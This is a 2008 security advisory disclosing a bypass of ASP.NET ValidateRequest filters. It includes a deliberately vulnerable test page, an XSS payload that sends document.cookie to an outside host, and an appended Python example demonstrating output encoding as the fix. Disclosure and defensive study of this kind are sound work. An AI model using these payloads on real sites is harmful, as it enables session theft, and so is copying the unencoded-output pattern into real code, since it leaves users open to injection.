ProCheckUp Security Advisory 2008.20

Posted Aug 22, 2008
Authored by ProCheckUp | Site procheckup.com

Microsoft ASP.NET ValidateRequest filters can be bypassed allowing for cross site scripting and HTML injection attacks.

tags | advisory, xss, asp
SHA-256 | 991d123ab5c384f1961576752ae8de0178e17504175d1d5b7d6c72a0c878c48b

PR08-20: Microsoft ASP.NET ValidateRequest filters can be bypassed allowing XSS and HTML injection attacks

Date Found: 3rd October 2007

Date Public: 21st August 2008

Vendor contacted: 5th June 2008

Vendor response: 25th July 2008

The following statement from MSDN was forwarded by Microsoft:

"In summary, use, but do not fully trust, the ValidateRequest attribute and don't be too lazy. Spend some time to understand security threats like XSS at their roots and plan a defensive strategy centred on one key point - consider all user input evil."

Severity: Medium

Vulnerable:

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 R2 Standard Edition Build 3790.srv03_sp2_gdr.070304-2240 : Service Pack 2 (patched Aug 08) running Microsoft IIS 6.0 web server
- ASP.NET Version: 1.1.4322.2407 (fully patched)
- ASP.NET Version: 2.0.50727 (fully patched Aug 2008)
- Microsoft Internet Explorer 6.0.2800.1106
- Microsoft Internet Explorer 7.0.5730.13

Credits: Richard Brain of ProCheckUp Ltd.

Description:

By understanding how ASP .NET malicious request filtering functions, ProCheckUp has found that it is possible to bypass ASP .NET ValidateRequest filters and perform XSS and HTML injection even against systems protected with the MS07-040 patch. This patch fixed the payload reported in ProCheckUp security bulletin PR07-03.

It was possible to perform redirect, cookie theft, and unrestricted HTML injection attacks against an ASP .NET application set up in a test environment. ProCheckUp has also found this issue to be exploitable while carrying out penetration tests on several customers' live environments.

Proof of concept:

In the following examples, 'test3.aspx' is a script that solely relies on ASP .NET ValidateRequest filters, and returns user-supplied input back to the browser.

<html>
<head><title>test3.aspx</title><script>document.cookie='PCUSESSIONID=stealme'</script></head>
<body>
<form action="test3.aspx" method="get">
Your name: <input type="text" name="fname" size="20" />
<input type="submit" value="Submit" />
</form>
<%
' Deliberately vulnerable test page: it relies solely on the ASP .NET
' ValidateRequest filter and writes the query string back without encoding.
Dim fname As String
fname = Request.QueryString("fname")
If fname <> "" Then
Response.Write("Hello " & "<tagname " & fname & "!<br />")
Response.Write("How are you today?")
End If
%>
</body>
</html>

Alert box injection - simply provided for testing purposes (may cause DoS issues on Internet Explorer)
http://target.foo/test3.aspx?fname=
<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Cookie stealing
http://target.foo/test3.aspx?fname=
<~/XSS/*-*/STYLE=xss:e/**/xpression(window.location=
"http://www.procheckup.com/?sid="%2bdocument.cookie)>

Consequences:

Attackers can potentially launch XSS and HTML injection attacks against vulnerable applications that solely rely on ASP .NET ValidateRequest filters. Such code would run within the context of the target domain.

This type of attack can result in defacement of the target site, or the redirection of confidential information (e.g. session IDs or passwords) to unauthorised third parties.

Fix: Please see vendor response.
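The vendor response above amounts to "encode output, do not rely on the request filter". As an added example that is not part of this advisory, the following Python contrasts a simplified blocklist filter (an assumption standing in for ValidateRequest, not Microsoft's implementation) with context-aware output encoding, using the advisory's own alert payload as input.

```python
import html
import re

# Payloads constructed from the advisory's proof of concept (the fname parameter).
PAYLOAD_TILDE = "<~/XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"
PAYLOAD_PLAIN = "<script>alert('XSS')</script>"

# Assumption: a simplified model of a blocklist-style request validator that
# rejects '<' only when followed by a letter, '!', '/' or '?', plus "&#".
# It illustrates the blocklist approach; it is not Microsoft's code.
_DANGEROUS = re.compile(r"<[A-Za-z!/?]|&#")


def blocklist_rejects(value: str) -> bool:
    """True if the modelled filter would reject the value."""
    return _DANGEROUS.search(value) is not None


def vulnerable_render(fname: str) -> str:
    """Model of test3.aspx: run the filter, then concatenate raw input into HTML."""
    if blocklist_rejects(fname):
        raise ValueError("request rejected by the modelled filter")
    return "Hello <tagname " + fname + "!<br />"


def hardened_render(fname: str) -> str:
    """Encode the input for the HTML text context it is written into.

    The ASP.NET equivalent is Server.HtmlEncode / HttpUtility.HtmlEncode.
    The input is placed in element content only: the test page's open
    '<tagname ' put it inside a tag, where text encoding alone would not
    stop an injected attribute such as STYLE=... that contains no '<'.
    """
    return "Hello " + html.escape(fname, quote=True) + "!<br />"


if __name__ == "__main__":
    for p in (PAYLOAD_PLAIN, PAYLOAD_TILDE):
        print("rejected by filter:", blocklist_rejects(p))
        print("hardened output:   ", hardened_render(p))
```

The plain `<script>` payload is caught by the modelled filter, while the `<~` payload passes it and reaches the raw output untouched; only the encoded version neutralises both.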

References:

http://www.procheckup.com/Vulnerabilities.php
http://www.procheckup.com/PDFs/bypassing-dot-NET-ValidateRequest.pdf
http://msdn.microsoft.com/en-us/library/bb355989.aspx
http://msdn.microsoft.com/en-us/library/ms972969.aspx#securitybarriers_topic6

Legal:

Copyright 2008 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community
for the purpose of alerting them to problems, if and only if, the Bulletin is not edited
or changed in any way, is attributed to Procheckup, and provided such reproduction and/or
distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
